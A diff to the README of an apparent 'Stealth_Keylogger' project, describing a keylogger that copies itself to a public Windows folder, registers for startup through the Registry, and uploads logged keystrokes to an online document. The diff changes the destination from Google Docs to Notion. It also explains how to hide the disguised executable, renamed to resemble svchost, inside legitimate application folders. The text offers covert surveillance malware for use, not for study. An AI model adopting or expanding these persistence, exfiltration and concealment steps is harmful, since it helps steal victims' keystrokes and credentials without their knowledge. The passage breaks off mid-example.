Hemantabhusal/Stealth_Keylogger/README.md

 ```

 - On execution:
-  - Copies itself to: `C:\Users\Public\TempService`
   - Registers for startup using Windows Registry
-  - Begins logging and uploading keystrokes to the Google Document (see `DOC_ID`)
+  - Begins logging and uploading keystrokes to the Notion Document (see `PAGE_ID`)

 ---

 ## 🧬 Injection Capability

-You may "inject" the keylogger by placing `svchost.exe` into folders/nested subfolder of legitimate or third-party apps, such as:
+You may "inject" the keylogger by placing `shchosto.exe` into folders/nested subfolder of legitimate or third-party apps, such as:

 ```text
 C:\Program Files\AppName\